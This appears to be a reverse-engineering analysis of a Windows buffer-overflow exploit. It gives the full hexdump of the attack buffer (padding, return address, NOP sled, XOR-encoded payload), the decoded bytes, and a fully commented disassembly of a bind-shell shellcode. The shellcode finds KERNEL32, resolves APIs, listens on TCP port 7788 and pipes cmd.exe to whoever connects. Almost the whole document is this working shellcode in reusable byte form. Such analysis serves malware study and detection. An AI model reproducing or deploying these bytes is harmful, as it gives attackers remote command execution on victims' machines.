hexdump
00000000 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 |CCCCCCCCCCCCCCCC|
*
00000100 43 43 43 43 43 43 43 43 43 43 43 43 4d 3f e3 77 |CCCCCCCCCCCCM?ãw|
00000110 90 90 90 90 ff 63 64 90 43 43 43 43 43 43 43 43 |....ÿcd.CCCCCCCC|
00000120 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 |CCCCCCCCCCCCCCCC|
00000130 43 43 43 43 43 43 43 43 90 eb 03 5d eb 05 e8 f8 |CCCCCCCC.ë.]ë.èø|
00000140 ff ff ff 83 c5 15 90 90 90 8b c5 33 c9 66 b9 10 |ÿÿÿ.Å.....Å3Éf¹.|
00000150 03 50 80 30 97 40 e2 fa 7e 8e 95 97 97 cd 1c 4d |.P.0.@âú~....Í.M|
00000160 14 7c 90 fd 68 c4 f3 36 97 97 97 97 c7 f3 1e b2 |.|.ýhÄó6....Çó.²|
00000170 97 97 97 97 a4 4c 2c 97 97 77 e0 7f 4b 96 97 97 |....€L,..wà.K...|
00000180 16 6c 97 97 68 28 98 14 59 96 97 97 16 54 97 97 |.l..h(..Y....T..|
00000190 96 97 f1 16 ac da cd e2 70 a4 57 1c d4 ab 94 54 |..ñ.¬ÚÍâp€W.Ô«.T|
000001a0 f1 16 af c7 d2 e2 4e 14 57 ef 1c a7 94 64 1c d9 |ñ.¯ÇÒâN.Wï.§.d.Ù|
000001b0 9b 94 5c 16 ae dc d2 c5 d9 e2 52 16 ee 93 d2 db |..\.®ÜÒÅÙâR.î.ÒÛ|
000001c0 a4 a5 e2 2b a4 68 1c d1 b7 94 54 1c 5c 94 9f 16 |€¥â+€h.Ñ·.T.\...|
000001d0 ae d0 f2 e3 c7 e2 9e 16 ee 93 e5 f8 f4 d6 e3 91 |®ÐòãÇâ..î.åøôÖã.|
000001e0 d0 14 57 93 7c 72 94 68 94 6c 1c c1 b3 94 6d a4 |Ð.W.|r.h.l.Á³.m€|
000001f0 45 f1 1c 80 1c 6d 1c d1 87 df 94 6f a4 5e 1c 58 |Eñ...m.Ñ.ß.o€^.X|
00000200 94 5e 94 5e 94 d9 8b 94 5c 1c ae 94 6c 7e fe 96 |.^.^.Ù..\.®.l~þ.|
00000210 97 97 c9 10 60 1c 40 a4 57 60 47 1c 5f 65 38 1e |..É.`.@€W`G._e8.|
00000220 a5 1a d5 9f c5 c7 c4 68 85 cd 1e d5 93 1a e5 82 |¥.Õ.ÅÇÄh.Í.Õ..å.|
00000230 c5 c1 68 c5 93 cd a4 57 3b 13 57 e2 6e a4 5e 1d |ÅÁhÅ.Í€W;.Wân€^.|
00000240 99 13 5e e3 9e c5 c1 c4 68 85 cd 3c 75 7f d1 c5 |..^ã.ÅÁÄh.Í<u.ÑÅ|
00000250 c1 68 c5 93 cd 1c 4f a4 57 3b 13 57 e2 6e a4 5e |ÁhÅ.Í.O€W;.Wân€^|
00000260 1d 99 17 6e 95 e3 9e c5 c1 c4 68 85 cd 3c 75 70 |...n.ã.ÅÁÄh.Í<up|
00000270 a4 57 c7 d7 c7 d7 c7 68 c0 7f 04 fd 87 c1 c4 68 |€WÇ×Ç×ÇhÀ..ý.ÁÄh|
00000280 c0 7b fd 95 c4 68 c0 67 a4 57 c0 c7 27 9b 3c cf |À{ý.ÄhÀg€WÀÇ'.<Ï|
00000290 3c d7 3c c8 df c7 c0 c1 3a c1 68 c0 57 df c7 c0 |<×<ÈßÇÀÁ:ÁhÀWßÇÀ|
000002a0 3a c1 3a c1 68 c0 57 df 27 d3 1e 90 c0 68 c0 53 |:Á:ÁhÀWß'Ó..ÀhÀS|
000002b0 a4 57 1c d1 63 1e d0 ab 1e d0 d7 1c 91 1e d0 af |€W.Ñc.Ы.Ð×...Я|
000002c0 a4 57 f1 2f 96 96 1e d0 bb c0 c0 a4 57 c7 c7 c7 |€Wñ/...лÀÀ€WÇÇÇ|
000002d0 d7 c7 df c7 c7 3a c1 a4 57 c7 68 c0 5f 68 e1 67 |×ÇßÇÇ:Á€WÇhÀ_hág|
000002e0 68 c0 5b 68 e1 6b 68 c0 5b df c7 c7 c4 68 c0 63 |hÀ[hákhÀ[ßÇÇÄhÀc|
000002f0 1c 4f a4 57 23 93 c7 56 7f 93 c7 68 c0 43 1c 67 |.O€W#.ÇV..ÇhÀC.g|
00000300 a4 57 1c 5f 22 93 c7 c7 c0 c6 c1 68 e0 3f 68 c0 |€W._".ÇÇÀÆÁhà?hÀ|
00000310 47 14 a8 96 eb b5 a4 57 c7 c0 68 a0 c1 68 e0 3f |G.š.ëµ€WÇÀh Áhà?|
00000320 68 c0 4b 9c 57 e3 b8 a4 57 c7 68 a0 c1 c4 68 c0 |hÀK.W㞀WÇh ÁÄhÀ|
00000330 6f fd c7 68 c0 77 7c 5f a4 57 c7 23 93 c7 c1 c4 |oýÇhÀw|_€WÇ#.ÇÁÄ|
00000340 68 c0 6b c0 a4 5e c6 c7 c1 68 e0 3b 68 c0 4f fd |hÀkÀ€^ÆÇÁhà;hÀOý|
00000350 c7 68 c0 77 7c 3d c7 68 c0 73 7c 69 cf c7 1e d5 |ÇhÀw|=ÇhÀs|iÏÇ.Õ|
00000360 65 54 1c d3 b3 9b 92 2f 97 97 97 50 97 ef c1 a3 |eT.Ó³../...P.ïÁ£|
00000370 85 a4 57 54 7c 7b 7f 75 6a 68 68 7f 05 69 68 68 |.€WT|{.ujhh..ihh|
00000380 dc c1 70 e0 b4 17 70 e0 db f8 f6 f3 db fe f5 e5 |ÜÁpàŽ.pàÛøöóÛþõå|
00000390 f6 e5 ee d6 97 dc d2 c5 d9 d2 db a4 a5 97 d4 e5 |öåîÖ.ÜÒÅÙÒÛ€¥.Ôå|
000003a0 f2 f6 e3 f2 c7 fe e7 f2 97 d0 f2 e3 c4 e3 f6 e5 |òöãòÇþçò.ÐòãÄãöå|
000003b0 e3 e2 e7 de f9 f1 f8 d6 97 d4 e5 f2 f6 e3 f2 c7 |ãâçÞùñøÖ.ÔåòöãòÇ|
000003c0 e5 f8 f4 f2 e4 e4 d6 97 d4 fb f8 e4 f2 df f6 f9 |åøôòääÖ.Ôûøäòßöù|
000003d0 f3 fb f2 97 c7 f2 f2 fc d9 f6 fa f2 f3 c7 fe e7 |óûò.ÇòòüÙöúòóÇþç|
000003e0 f2 97 d0 fb f8 f5 f6 fb d6 fb fb f8 f4 97 c0 e5 |ò.ÐûøõöûÖûûøô.Àå|
000003f0 fe e3 f2 d1 fe fb f2 97 c5 f2 f6 f3 d1 fe fb f2 |þãòÑþûò.ÅòöóÑþûò|
00000400 97 c4 fb f2 f2 e7 97 d2 ef fe e3 c7 e5 f8 f4 f2 |.Äûòòç.ÒïþãÇåøôò|
00000410 e4 e4 97 97 c0 c4 d8 d4 dc a4 a5 97 e4 f8 f4 fc |ää..ÀÄØÔÜ€¥.äøôü|
00000420 f2 e3 97 f5 fe f9 f3 97 fb fe e4 e3 f2 f9 97 f6 |òã.õþùó.ûþäãòù.ö|
00000430 f4 f4 f2 e7 e3 97 e4 f2 f9 f3 97 e5 f2 f4 e1 97 |ôôòçã.äòùó.åòôá.|
00000440 95 97 89 fb 97 97 97 97 97 97 97 97 97 97 97 97 |...û............|
00000450 f4 fa f3 b9 f2 ef f2 97 68 68 68 68 0d 0a 0d 0a |ôúó¹òïò.hhhh....|
00000460 00 |.|
00000461
00000000 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 |CCCCCCCCCCCCCCCC| * 00000100 43 43 43 43 43 43 43 43 43 43 43 43 4d 3f e3 77 |CCCCCCCCCCCCM?ãw| 00000110 90 90 90 90 ff 63 64 90 43 43 43 43 43 43 43 43 |....ÿcd.CCCCCCCC| 00000120 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 |CCCCCCCCCCCCCCCC| 00000130 43 43 43 43 43 43 43 43 90 90 90 90 90 90 90 90 |CCCCCCCC........| 00000140 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................| 00000150 90 90 90 90 90 90 90 90 e9 19 02 00 00 5a 8b da |........é....Z.Ú| 00000160 83 eb 07 6a ff 53 64 a1 00 00 00 00 50 64 89 25 |.ë.jÿSd¡....Pd.%| 00000170 00 00 00 00 33 db bb 00 00 e0 77 e8 dc 01 00 00 |....3Û»..àwèÜ...| 00000180 81 fb 00 00 ff bf 0f 83 ce 01 00 00 81 c3 00 00 |.û..ÿ¿..Î....Ã..| 00000190 01 00 66 81 3b 4d 5a 75 e7 33 c0 8b 43 3c 03 c3 |..f.;MZuç3À.C<.Ã| 000001a0 66 81 38 50 45 75 d9 83 c0 78 8b 30 03 f3 8b 4e |f.8PEuÙ.Àx.0.ó.N| 000001b0 0c 03 cb 81 39 4b 45 52 4e 75 c5 81 79 04 45 4c |..Ë.9KERNuÅ.y.EL| 000001c0 33 32 75 bc 33 ff 8b 46 20 03 c3 8b cb 03 08 81 |32uŒ3ÿ.F .Ã.Ë...| 000001d0 39 47 65 74 50 75 09 81 79 04 72 6f 63 41 74 06 |9GetPu..y.rocAt.| 000001e0 47 83 c0 04 eb e5 03 ff 03 fb 8b 56 24 03 fa 33 |G.À.ëå.ÿ.û.V$.ú3| 000001f0 d2 66 8b 17 8b fa 8b 46 10 48 03 f8 33 c9 8b cf |Òf...ú.F.H.ø3É.Ï| 00000200 03 c9 03 c9 03 4e 1c 03 cb 8b 39 03 fb e9 69 01 |.É.É.N..Ë.9.ûéi.| 00000210 00 00 5e 87 f7 8b d7 33 c0 f7 d0 8b c8 f2 af 89 |..^.÷.×3À÷Ð.Èò¯.| 00000220 32 8d 42 08 52 50 53 ff 12 5a 89 42 04 8d 72 15 |2.B.RPSÿ.Z.B..r.| 00000230 52 56 ff 52 04 5a 33 c0 ac 84 c0 75 f9 33 c9 8a |RVÿR.Z3À¬.Àuù3É.| 00000240 0e 84 c9 74 09 52 56 53 ff 12 5a ab e2 e8 46 52 |..Ét.RVSÿ.Z«âèFR| 00000250 56 ff 52 04 5a 8b d8 33 c0 ac 84 c0 75 f9 33 c9 |VÿR.Z.Ø3À¬.Àuù3É| 00000260 8a 0e 80 f9 02 74 09 52 56 53 ff 12 5a ab e2 e7 |...ù.t.RVSÿ.Z«âç| 00000270 33 c0 50 40 50 40 50 ff 57 e8 93 6a 10 56 53 ff |3ÀP@P@PÿWè.j.VSÿ| 00000280 57 ec 6a 02 53 ff 57 f0 33 c0 57 50 b0 0c ab 58 |Wìj.SÿWð3ÀWP°.«X| 00000290 ab 40 ab 5f 
48 50 57 56 ad 56 ff 57 c0 48 50 57 |«@«_HPWVVÿWÀHPW| 000002a0 ad 56 ad 56 ff 57 c0 48 b0 44 89 07 57 ff 57 c4 |VVÿWÀH°D..WÿWÄ| 000002b0 33 c0 8b 46 f4 89 47 3c 89 47 40 8b 06 89 47 38 |3À.Fô.G<.G@...G8| 000002c0 33 c0 66 b8 01 01 89 47 2c 57 57 33 c0 50 50 50 |3Àfž...G,WW3ÀPPP| 000002d0 40 50 48 50 50 ad 56 33 c0 50 ff 57 c8 ff 76 f0 |@PHPPV3ÀPÿWÈÿvð| 000002e0 ff 57 cc ff 76 fc ff 57 cc 48 50 50 53 ff 57 f4 |ÿWÌÿvüÿWÌHPPSÿWô| 000002f0 8b d8 33 c0 b4 04 50 c1 e8 04 50 ff 57 d4 8b f0 |.Ø3ÀŽ.PÁè.PÿWÔ.ð| 00000300 33 c0 8b c8 b5 04 50 50 57 51 56 ff 77 a8 ff 57 |3À.ȵ.PPWQVÿwšÿW| 00000310 d0 83 3f 01 7c 22 33 c0 50 57 ff 37 56 ff 77 a8 |Ð.?.|"3ÀPWÿ7Vÿwš| 00000320 ff 57 dc 0b c0 74 2f 33 c0 50 ff 37 56 53 ff 57 |ÿWÜ.Àt/3ÀPÿ7VSÿW| 00000330 f8 6a 50 ff 57 e0 eb c8 33 c0 50 b4 04 50 56 53 |øjPÿWàëÈ3ÀPŽ.PVS| 00000340 ff 57 fc 57 33 c9 51 50 56 ff 77 ac ff 57 d8 6a |ÿWüW3ÉQPVÿw¬ÿWØj| 00000350 50 ff 57 e0 eb aa 50 ff 57 e4 eb fe 58 50 89 42 |PÿWàëªPÿWäëþXP.B| 00000360 f2 c3 8b 44 24 0c 05 b8 00 00 00 c7 00 78 56 34 |òÃ.D$..ž...Ç.xV4| 00000370 12 33 c0 c3 eb ec e8 e2 fd ff ff e8 92 fe ff ff |.3ÀÃëìèâýÿÿè.þÿÿ| 00000380 4b 56 e7 77 23 80 e7 77 4c 6f 61 64 4c 69 62 72 |KVçw#.çwLoadLibr| 00000390 61 72 79 41 00 4b 45 52 4e 45 4c 33 32 00 43 72 |aryA.KERNEL32.Cr| 000003a0 65 61 74 65 50 69 70 65 00 47 65 74 53 74 61 72 |eatePipe.GetStar| 000003b0 74 75 70 49 6e 66 6f 41 00 43 72 65 61 74 65 50 |tupInfoA.CreateP| 000003c0 72 6f 63 65 73 73 41 00 43 6c 6f 73 65 48 61 6e |rocessA.CloseHan| 000003d0 64 6c 65 00 50 65 65 6b 4e 61 6d 65 64 50 69 70 |dle.PeekNamedPip| 000003e0 65 00 47 6c 6f 62 61 6c 41 6c 6c 6f 63 00 57 72 |e.GlobalAlloc.Wr| 000003f0 69 74 65 46 69 6c 65 00 52 65 61 64 46 69 6c 65 |iteFile.ReadFile| 00000400 00 53 6c 65 65 70 00 45 78 69 74 50 72 6f 63 65 |.Sleep.ExitProce| 00000410 73 73 00 00 57 53 4f 43 4b 33 32 00 73 6f 63 6b |ss..WSOCK32.sock| 00000420 65 74 00 62 69 6e 64 00 6c 69 73 74 65 6e 00 61 |et.bind.listen.a| 00000430 63 63 65 70 74 00 73 65 6e 64 00 72 65 
63 76 00 |ccept.send.recv.| 00000440 02 00 1e 6c 00 00 00 00 00 00 00 00 00 00 00 00 |...l............| 00000450 63 6d 64 2e 65 78 65 00 ff ff ff ff 9a 9d 9a 9d |cmd.exe.ÿÿÿÿ....| 00000460 97 |.| 00000461
; XOR decoder stub as OllyDbg shows it (module "dummy2"). The same bytes sit at
; offset 0x139 of the hexdump above (EB 03 5D EB 05 E8 F8 FF FF FF 83 C5 15 ...).
; jmp/call/pop "get-PC" sequence: the CALL pushes 00421A3C, POP EBP takes it, and
; EBP+0x15 = 00421A51 is the first encoded byte (dump offset 0x158, 7E ^ 97 = E9).
; Analyst note: single-byte XOR key 0x97, count 0x310; 0x158 + 0x310 = 0x468, so the
; loop touches 7 bytes beyond the 0x461 bytes shown. This stub is the only part of the
; buffer that is not XOR-encoded on the wire.
00421A32  EB 03          JMP SHORT dummy2.00421A37        ; hop over the POP to the CALL
00421A34  5D             POP EBP                          ; EBP = 00421A3C (return address pushed by the CALL below)
00421A35  EB 05          JMP SHORT dummy2.00421A3C        ; continue past the CALL
00421A37  E8 F8FFFFFF    CALL dummy2.00421A34             ; backward CALL: pushes 00421A3C, lands on the POP
00421A3C  83C5 15        ADD EBP,15                       ; EBP = 00421A51 = start of the encoded payload
00421A3F  90             NOP                              ; filler
00421A40  90             NOP
00421A41  90             NOP
00421A42  8BC5           MOV EAX,EBP                      ; EAX = running decode pointer
00421A44  33C9           XOR ECX,ECX
00421A46  66:B9 1003     MOV CX,310                       ; ECX = 0x310 (784) bytes to decode
00421A4A  50             PUSH EAX                         ; payload start left on the stack; the stub never pops it
00421A4B  8030 97        XOR BYTE PTR DS:[EAX],97         ; decode one byte in place with key 0x97
00421A4E  40             INC EAX
00421A4F  ^E2 FA         LOOPD SHORT dummy2.00421A4B      ; on exit falls through into the decoded payload at 00421A51
; Decoded payload (IDA listing; addresses are offsets from the start of the buffer).
; Analyst summary, taken from the calls below:
;   1. loc_376/loc_15D: install an SEH frame whose handler (loc_362) resumes the
;      scan loop after an access fault, then scan 77E00000h..BFFF0000h in 64 KiB
;      steps for an MZ/PE image whose export name is "KERNEL32".
;   2. loc_1CB/loc_1E6: walk that image's export table for "GetProcAddress".
;   3. loc_212: resolve LoadLibraryA, then every name in the list at 388h..43Fh
;      (KERNEL32 set, then the WSOCK32 set), appending the pointers after the
;      FFFFFFFFh sentinel at 458h, i.e. into memory beyond the dumped bytes.
;   4. loc_270: socket/bind/listen on the sockaddr at 440h (AF_INET, port bytes
;      1E 6C = TCP 7788, INADDR_ANY), two pipes, CreateProcessA("cmd.exe") with
;      its std handles on those pipes, accept(), then loc_300 relays between the
;      accepted socket and the pipes until ReadFile fails, then ExitProcess.
; Detection artifacts: "KERNEL32", "WSOCK32", "cmd.exe" and the API names are
; XOR 0x97 on the wire; the fixed 77E00000h scan base and the placeholder
; addresses at 380h/384h tie the code to a fixed KERNEL32 layout (no ASLR).
; Register roles once loc_212 has run: edx = 380h (data area), edi = next free
; slot of the pointer table (49Ch when the table is complete), esi = string cursor,
; ebx = KERNEL32 base, then the WSOCK32 handle, then the listening/connected socket.
00000158         jmp     loc_376                 ; entry: first decoded byte, sets up the data pointer
0000015D ; ---------------------------------------------------------------------------
0000015D
0000015D loc_15D:                                ; reached via the call at loc_376
0000015D         pop     edx                     ; edx = 37Bh, return address used as base of the data area
0000015E         mov     ebx, edx
00000160         sub     ebx, 7                  ; ebx = 374h = "jmp short loc_362", the SEH handler stub
00000163         push    0FFFFFFFFh              ; extra dword beneath the registration record; nothing here reads it
00000165         push    ebx                     ; EXCEPTION_REGISTRATION.handler = 374h
00000166         mov     eax, large fs:0
0000016C         push    eax                     ; EXCEPTION_REGISTRATION.prev = old list head
0000016D         mov     large fs:0, esp         ; install: access faults during the scan below land in loc_362
00000174         xor     ebx, ebx
00000176         mov     ebx, 77E00000h          ; hard-coded scan start; only finds KERNEL32 if it is mapped above this address
0000017B         call    loc_35C                 ; patches loc_180's address into the handler (see loc_35C) and returns
00000180
00000180 loc_180:                                ; scan loop; also the resume point after a caught fault
00000180         cmp     ebx, 0BFFF0000h
00000186
00000186 loc_186:
00000186         jnb     loc_35A                 ; scanned the whole range without a hit: spin forever
0000018C         add     ebx, 10000h             ; next 64 KiB boundary (allocation granularity)
00000192         cmp     word ptr [ebx], 'ZM'    ; IMAGE_DOS_HEADER.e_magic
00000197         jnz     short loc_180
00000199         xor     eax, eax
0000019B         mov     eax, [ebx+3Ch]          ; e_lfanew
0000019E         add     eax, ebx
000001A0         cmp     word ptr [eax], 'EP'    ; IMAGE_NT_HEADERS.Signature
000001A5         jnz     short loc_180
000001A7         add     eax, 78h                ; DataDirectory[EXPORT].VirtualAddress
000001AA         mov     esi, [eax]
000001AC         add     esi, ebx                ; esi = IMAGE_EXPORT_DIRECTORY
000001AE         mov     ecx, [esi+0Ch]          ; export directory Name RVA
000001B1         add     ecx, ebx
000001B3         cmp     dword ptr [ecx], 'NREK' ; module name must start with "KERNEL32"
000001B9         jnz     short loc_180
000001BB         cmp     dword ptr [ecx+4], '23LE'
000001C2         jnz     short loc_180
000001C4         xor     edi, edi                ; edi = index into the name table
000001C6         mov     eax, [esi+20h]          ; AddressOfNames
000001C9         add     eax, ebx
000001CB
000001CB loc_1CB:                                ; scan export names for "GetProcA" (no NumberOfNames bound)
000001CB         mov     ecx, ebx
000001CD         add     ecx, [eax]
000001CF         cmp     dword ptr [ecx], 'PteG'
000001D5         jnz     short loc_1E0
000001D7         cmp     dword ptr [ecx+4], 'Acor'
000001DE         jz      short loc_1E6
000001E0
000001E0 loc_1E0:
000001E0         inc     edi
000001E1         add     eax, 4
000001E4         jmp     short loc_1CB
000001E6 ; ---------------------------------------------------------------------------
000001E6
000001E6 loc_1E6:                                ; edi = index of the matching name
000001E6         add     edi, edi                ; word index
000001E8         add     edi, ebx
000001EA         mov     edx, [esi+24h]          ; AddressOfNameOrdinals
000001ED         add     edi, edx
000001EF         xor     edx, edx
000001F1         mov     dx, [edi]               ; ordinal
000001F4         mov     edi, edx
000001F6         mov     eax, [esi+10h]          ; Base
000001F9         dec     eax
000001FA         add     edi, eax                ; edi = ordinal + Base - 1, used as the AddressOfFunctions index
000001FC         xor     ecx, ecx
000001FE         mov     ecx, edi
00000200         add     ecx, ecx
00000202         add     ecx, ecx                ; * 4
00000204         add     ecx, [esi+1Ch]          ; AddressOfFunctions
00000207         add     ecx, ebx
00000209         mov     edi, [ecx]
0000020B         add     edi, ebx                ; edi = GetProcAddress
0000020D         jmp     loc_37B                 ; -> call loc_212 with 380h as the return address
00000212 ; ---------------------------------------------------------------------------
00000212
00000212 loc_212:
00000212         pop     esi                     ; esi = 380h (hGetProcAddress slot)
00000213         xchg    esi, edi                ; esi = GetProcAddress, edi = 380h
00000215         mov     edx, edi                ; edx = 380h, data-area base for the rest of the code
00000217         xor     eax, eax
00000219         not     eax                     ; eax = FFFFFFFFh = the sentinel stored at 458h
0000021B         mov     ecx, eax
0000021D         repne scasd                     ; find the sentinel; edi = 45Ch = first slot of the pointer table
0000021F         mov     [edx], esi              ; [380h] = GetProcAddress, replacing the placeholder
00000221         lea     eax, [edx+8]            ; "LoadLibraryA"
00000224         push    edx
00000225         push    eax
00000226         push    ebx                     ; KERNEL32 base
00000227         call    dword ptr [edx]         ; GetProcAddress(kernel32, "LoadLibraryA")
00000229         pop     edx
0000022A         mov     [edx+4], eax            ; [384h] = LoadLibraryA
0000022D         lea     esi, [edx+15h]          ; "KERNEL32"
00000230         push    edx
00000231         push    esi
00000232         call    dword ptr [edx+4]       ; LoadLibraryA("KERNEL32"); result unused, ebx keeps the base
00000235         pop     edx
00000236
00000236 loc_236:                                ; for each name following the previous NUL: resolve and append
00000236         xor     eax, eax
00000238         lodsb
00000239         test    al, al
0000023B         jnz     short loc_236           ; advance past the terminating NUL
0000023D         xor     ecx, ecx
0000023F         mov     cl, [esi]
00000241         test    cl, cl
00000243         jz      short loc_24E           ; empty name (the lone 0 at 413h) ends the KERNEL32 list
00000245         push    edx
00000246         push    esi
00000247         push    ebx
00000248         call    dword ptr [edx]         ; GetProcAddress(kernel32, name)
0000024A         pop     edx
0000024B         stosd                           ; append; slots become CreatePipe@45C .. ExitProcess@480
0000024C         loop    loc_236                 ; ecx = first byte of a printable name, still nonzero after dec: always taken
0000024E
0000024E loc_24E:
0000024E         inc     esi                     ; esi = 414h "WSOCK32"
0000024F         push    edx
00000250         push    esi
00000251         call    dword ptr [edx+4]       ; LoadLibraryA("WSOCK32")
00000254         pop     edx
00000255         mov     ebx, eax                ; ebx = WSOCK32 module handle
00000257
00000257 loc_257:                                ; same resolve loop for the winsock names
00000257         xor     eax, eax
00000259         lodsb
0000025A         test    al, al
0000025C         jnz     short loc_257
0000025E         xor     ecx, ecx
00000260         mov     cl, [esi]
00000262         cmp     cl, 2                   ; the sockaddr at 440h begins with 02 (AF_INET): end of the list
00000265         jz      short loc_270
00000267         push    edx
00000268         push    esi
00000269         push    ebx
0000026A         call    dword ptr [edx]         ; GetProcAddress(wsock32, name)
0000026C         pop     edx
0000026D         stosd                           ; socket@484 bind@488 listen@48C accept@490 send@494 recv@498; edi ends at 49Ch
0000026E         loop    loc_257
00000270
00000270 loc_270:                                ; esi = 440h (sockaddr); from here [edi-N] indexes the pointer table
00000270         xor     eax, eax
00000272         push    eax                     ; protocol = 0
00000273         inc     eax
00000274         push    eax                     ; SOCK_STREAM
00000275         inc     eax
00000276         push    eax                     ; AF_INET
00000277         call    dword ptr [edi-18h]     ; socket(AF_INET, SOCK_STREAM, 0)
0000027A         xchg    eax, ebx                ; ebx = listening socket
0000027B         push    10h                     ; sizeof(sockaddr_in)
0000027D         push    esi                     ; sockaddr: AF_INET, port bytes 1E 6C (TCP 7788), INADDR_ANY
0000027E         push    ebx
0000027F         call    dword ptr [edi-14h]     ; bind
00000282         push    2                       ; backlog
00000284         push    ebx
00000285         call    dword ptr [edi-10h]     ; listen
00000288         xor     eax, eax
0000028A         push    edi                     ; remember 49Ch
0000028B         push    eax
0000028C         mov     al, 0Ch
0000028E         stosd                           ; SECURITY_ATTRIBUTES.nLength = 0Ch, built at 49Ch
0000028F         pop     eax
00000290         stosd                           ; lpSecurityDescriptor = NULL
00000291         inc     eax
00000292         stosd                           ; bInheritHandle = TRUE
00000293         pop     edi                     ; edi = 49Ch = &sa; the same area is reused as STARTUPINFO, PROCESS_INFORMATION and scratch
00000294         dec     eax                     ; eax = 0
00000295         push    eax                     ; nSize = 0
00000296         push    edi                     ; lpPipeAttributes = &sa (inheritable)
00000297         push    esi                     ; hWritePipe -> 440h
00000298         lodsd
00000299         push    esi                     ; hReadPipe  -> 444h
0000029A         call    dword ptr [edi-40h]     ; CreatePipe: pipe A (child stdout/stderr); overwrites the no-longer-needed sockaddr
0000029D         dec     eax                     ; return value assumed TRUE (1 -> 0); never checked
0000029E         push    eax
0000029F         push    edi
000002A0         lodsd
000002A1         push    esi                     ; hWritePipe -> 448h
000002A2         lodsd
000002A3         push    esi                     ; hReadPipe  -> 44Ch
000002A4         call    dword ptr [edi-40h]     ; CreatePipe: pipe B (child stdin)
000002A7         dec     eax
000002A8         mov     al, 44h
000002AA         mov     [edi], eax              ; STARTUPINFO.cb = 44h
000002AC         push    edi
000002AD         call    dword ptr [edi-3Ch]     ; GetStartupInfoA(&si)
000002B0         xor     eax, eax
000002B2         mov     eax, [esi-0Ch]          ; pipe A write end (440h)
000002B5         mov     [edi+3Ch], eax          ; si.hStdOutput
000002B8         mov     [edi+40h], eax          ; si.hStdError
000002BB         mov     eax, [esi]              ; pipe B read end (44Ch)
000002BD         mov     [edi+38h], eax          ; si.hStdInput
000002C0         xor     eax, eax
000002C2         mov     ax, 101h                ; STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW; wShowWindow stays 0 (hidden)
000002C6         mov     [edi+2Ch], eax          ; si.dwFlags
000002C9         push    edi                     ; lpProcessInformation (same buffer as si)
000002CA         push    edi                     ; lpStartupInfo
000002CB         xor     eax, eax
000002CD         push    eax                     ; lpCurrentDirectory = NULL
000002CE         push    eax                     ; lpEnvironment = NULL
000002CF         push    eax                     ; dwCreationFlags = 0
000002D0         inc     eax
000002D1         push    eax                     ; bInheritHandles = TRUE, so the pipe ends reach the child
000002D2         dec     eax
000002D3         push    eax                     ; lpThreadAttributes = NULL
000002D4         push    eax                     ; lpProcessAttributes = NULL
000002D5         lodsd
000002D6         push    esi                     ; lpCommandLine = "cmd.exe" at 450h
000002D7         xor     eax, eax
000002D9         push    eax                     ; lpApplicationName = NULL
000002DA         call    dword ptr [edi-38h]     ; CreateProcessA
000002DD         push    dword ptr [esi-10h]     ; pipe A write end: drop the parent's copy
000002E0         call    dword ptr [edi-34h]     ; CloseHandle
000002E3         push    dword ptr [esi-4]       ; pipe B read end: drop the parent's copy
000002E6         call    dword ptr [edi-34h]     ; CloseHandle
000002E9         dec     eax                     ; 1 -> 0
000002EA         push    eax                     ; addrlen = NULL
000002EB         push    eax                     ; addr = NULL
000002EC         push    ebx
000002ED         call    dword ptr [edi-0Ch]     ; accept: blocks until a client connects
000002F0         mov     ebx, eax                ; ebx = connected socket
000002F2         xor     eax, eax
000002F4         mov     ah, 4                   ; eax = 400h
000002F6         push    eax                     ; dwBytes = 1024
000002F7         shr     eax, 4                  ; 40h = GMEM_ZEROINIT
000002FA         push    eax
000002FB         call    dword ptr [edi-2Ch]     ; GlobalAlloc
000002FE         mov     esi, eax                ; esi = 1 KiB transfer buffer
00000300
00000300 loc_300:                                ; relay loop: child stdout -> socket, then socket -> child stdin
00000300         xor     eax, eax
00000302         mov     ecx, eax
00000304         mov     ch, 4                   ; ecx = 400h
00000306         push    eax                     ; lpBytesLeftThisMessage = NULL
00000307         push    eax                     ; lpTotalBytesAvail = NULL
00000308         push    edi                     ; lpBytesRead -> [edi]
00000309         push    ecx                     ; nBufferSize
0000030A         push    esi                     ; lpBuffer
0000030B         push    dword ptr [edi-58h]     ; pipe A read end (444h)
0000030E
0000030E loc_30E:
0000030E         call    dword ptr [edi-30h]     ; PeekNamedPipe
00000311         cmp     dword ptr [edi], 1
00000314         jl      short loc_338           ; nothing pending from the child: service the socket instead
00000316         xor     eax, eax
00000318         push    eax                     ; lpOverlapped = NULL
00000319         push    edi                     ; lpNumberOfBytesRead
0000031A         push    dword ptr [edi]         ; nNumberOfBytesToRead = count reported by the peek
0000031C         push    esi
0000031D         push    dword ptr [edi-58h]
00000320         call    dword ptr [edi-24h]     ; ReadFile(pipe A read end)
00000323         or      eax, eax
00000325         jz      short loc_356           ; read failed (e.g. the child exited and the pipe broke): terminate
00000327         xor     eax, eax
00000329         push    eax                     ; flags = 0
0000032A         push    dword ptr [edi]         ; len = bytes read
0000032C         push    esi
0000032D         push    ebx
0000032E         call    dword ptr [edi-8]       ; send(client, buf, n, 0)
00000331         push    50h                     ; 80 ms
00000333         call    dword ptr [edi-20h]     ; Sleep
00000336         jmp     short loc_300
00000338 ; ---------------------------------------------------------------------------
00000338
00000338 loc_338:
00000338         xor     eax, eax
0000033A         push    eax                     ; flags = 0
0000033B         mov     ah, 4
0000033D         push    eax                     ; len = 400h
0000033E         push    esi
0000033F         push    ebx
00000340         call    dword ptr [edi-4]       ; recv(client, buf, 400h, 0): blocks until the client sends
00000343         push    edi                     ; lpOverlapped slot receives edi
00000344         xor     ecx, ecx
00000346         push    ecx                     ; lpNumberOfBytesWritten = NULL
00000347         push    eax                     ; nNumberOfBytesToWrite = recv result, used unchecked
00000348         push    esi
00000349         push    dword ptr [edi-54h]     ; pipe B write end (448h)
0000034C         call    dword ptr [edi-28h]     ; WriteFile -> child stdin
0000034F         push    50h                     ; 80 ms
00000351         call    dword ptr [edi-20h]     ; Sleep
00000354         jmp     short loc_300
00000356 ; ---------------------------------------------------------------------------
00000356
00000356 loc_356:
00000356         push    eax                     ; exit code 0
00000357         call    dword ptr [edi-1Ch]     ; ExitProcess: the host process terminates with the session
0000035A
0000035A loc_35A:                                ; scan failure path: the host thread hangs here and never returns
0000035A         jmp     short loc_35A
